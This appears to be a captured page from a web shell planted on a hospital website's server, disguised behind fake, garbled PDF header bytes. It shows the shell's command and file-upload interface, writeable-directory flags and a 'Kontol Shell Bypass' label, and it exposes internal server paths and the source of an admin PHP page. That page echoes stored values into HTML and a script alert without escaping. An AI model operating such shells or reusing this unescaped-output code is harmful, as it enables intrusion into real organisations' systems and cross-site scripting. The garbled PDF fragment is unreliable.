%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital.org/application/views_new/admin/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/application/views_new/admin/ViewSEO.php
<?php 
	include("includes/header.php"); 
	include("includes/sidebar.php"); 
	error_reporting(0);
	?>
		
			<!-- Page Content -->
			<div class="right_col" role="main">
				<div class="">
					
					<!-- Page Title Bar -->
					<div class="page-title">
					  
					  <div class="title_left">
						<h3>Custom SEO</h3>
					  </div>

					  <div class="title_right">
						<div class="col-md-5 col-sm-5 col-xs-12 form-group pull-right top_search">
						  <div class="input-group">
							<input type="text" class="form-control" placeholder="Search for...">
							<span class="input-group-btn">
							  <button class="btn btn-default" type="button">Go!</button>
							</span>
						  </div>
						</div>
					  </div>
					  
					</div>
					<!-- End of Page Title Bar -->

					<div class="clearfix"></div>
					
					<?php if((isset($msg))&&($msg!='')){ 
                    	echo '<script>alert("'.$msg.'");</script>';
                    } ?>

					<!-- Content Section -->
					<div class="row">
					  <div class="col-md-12 col-sm-12 col-xs-12">
						<div class="x_panel">
							
							<!-- Panel Title -->
							<div class="x_title">
                    			<h2>Custom SEO</h2>
                    			<ul class="nav navbar-right panel_toolbox">
								  <li><a class="add-new-link" href="<?php echo base_url();?>admin/Seo/add_seo_entry">Add SEO Entries</a></li>
								  <li><a class="collapse-link"><i class="fa fa-chevron-up"></i></a>
								  </li>
								</ul>
                    			<div class="clearfix"></div>
                    		</div>
                    		<!-- End of Panel Title -->
                    		
                    		<!-- Panel Content -->
                    		<div class="x_content">
				
								<table id="datatable-buttons" class="table table-striped table-bordered">
								  <thead>
									<tr>
									  <th width="24" class="actions">
										  <input type="checkbox" id="check-all" class="flat">
									  </th>
									<!--  <th width="17">EntryID</th> -->
									  
									<!--  <th width="42">PageModule</th> -->
									  <th width="50">Title</th>
                                      <th width="127">Keywords</th>
									  <th width="44">PageURL</th>
                                      <th width="127">Description</th>
									 									  
									  <th width="42" class="actions"></th>
									</tr>
								  </thead>								  
								  <tbody>
									<?php 
									
									foreach($records as $key=>$record){ ?>
										<tr id="<?php echo $record['SEOEntryID'] ?>">
										  <td class="a-center ">
											  <input type="checkbox" class="flat" name="table_records">
										  </td>
									<!--	  <td><?php echo $record['SEOEntryID'];?></td> -->
										  
										<!--  <td><?php echo $record['SEOPageModule'];?></td> -->
										  <td><?php echo $record['SEOTitle'] ; ?></td>
                                          <td><?php echo $record['SEOKeywords'] ; ?></td>	
										  <td><?php echo $record['SEOPageURL'];?></td>					
                                          <td><?php echo $record['SEODescription'] ; ?></td>
										  
										  <td>
											<ul class="nav">
										<!--		<li style="float:left;"><a href="#">Quick Edit</a></li> -->
												<li style="float:left;"><a href="<?php echo base_url();?>admin/Seo/update_seo_entry/<?php echo $record['SEOEntryID'];?>"><i class="fa fa-2x fa-edit"></i></a></li> 
												<li style="float:left;"><a href="<?php echo base_url();?>admin/Seo/remove_seo/<?php echo $record['SEOEntryID'];?>"><i class="fa fa-2x fa-times-circle "></i></li>
											</ul>
										  </td>
										</tr>
									<?php }?>
						
						
								  </tbody>
								</table>

						    </div>
							<!-- End of Panel Content -->
							
						</div>
					  </div>
					</div>
					<!-- End of Content Section -->
                
				 </div>
			</div>
            <!-- End of Page Content -->

	
<?php	
	include("includes/footer.php"); 
?>
<script type="text/javascript" language="javascript">

    // $(".remove").click(function(){
	// 	var id = $(this).parents("tr").attr("id");
	// 	if(confirm('Are you sure to remove this record ?'))
    //     {
    //         $.ajax({
    //            url: 'Seo/remove_seo',
    //            type: 'GET',
    //            data: {id: id},
    //            success: function(data) {
	// 			   console.log('here');
    //                 $("#"+id).remove();
	// 				location.reload();
    //                // alert("Record removed successfully");  
    //            }
			  
    //         });
    //     }
    // });

</script>

Kontol Shell Bypass